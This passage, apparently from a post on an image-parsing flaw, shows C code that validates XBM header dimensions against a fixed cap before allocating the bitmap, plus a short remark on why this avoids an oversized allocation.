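        char buf[128], name[64], tok[32];

        if (len < sizeof buf) {               /* overlong lines are ignored */
            memcpy(buf, line, len);
            buf[len] = '\0';
            /* "#define <name> <value>"; a trailing comment is ignored */
            if (sscanf(buf, "#define %63[A-Za-z0-9_] %31s", name, tok) == 2) {
                size_t nlen = strlen(name);
                unsigned long v;
                if (nlen > 6 && strcmp(name + nlen - 6, "_width") == 0) {
                    if (parse_dim(tok, &v) != 0) return -1;
                    w = v; have_w = 1;
                } else if (nlen > 7 && strcmp(name + nlen - 7, "_height") == 0) {
                    if (parse_dim(tok, &v) != 0) return -1;
                    h = v; have_h = 1;
                }
            }
        }
        if (!nl) break;
        line = nl + 1;
    }

    if (!have_w || !have_h) return -1;
    if (w == 0 || h == 0 || w > XBM_MAX_DIM || h > XBM_MAX_DIM) return -1;

    *width = w;
    *height = h;
    *nbytes = ((w + 7) / 8) * h;
    return 0;
}

/* Allocate the bitmap only after the header passed validation; NULL otherwise. */
unsigned char *xbm_alloc_bitmap(const char *text, size_t *nbytes)
{
    unsigned long w, h;
    if (xbm_parse_header(text, &w, &h, nbytes) != 0) return NULL;
    return calloc(*nbytes, 1);
}

/* Check helper: bytes the header implies, 0 if the header is rejected. */
size_t xbm_bitmap_size(const char *text)
{
    unsigned long w, h;
    size_t n = 0;
    if (xbm_parse_header(text, &w, &h, &n) != 0) return 0;
    return n;
}
```

The decision to allocate is made from validated numbers and a fixed cap rather than from whatever the file declares, which is the difference between a rejected image and the oversized allocation the post describes.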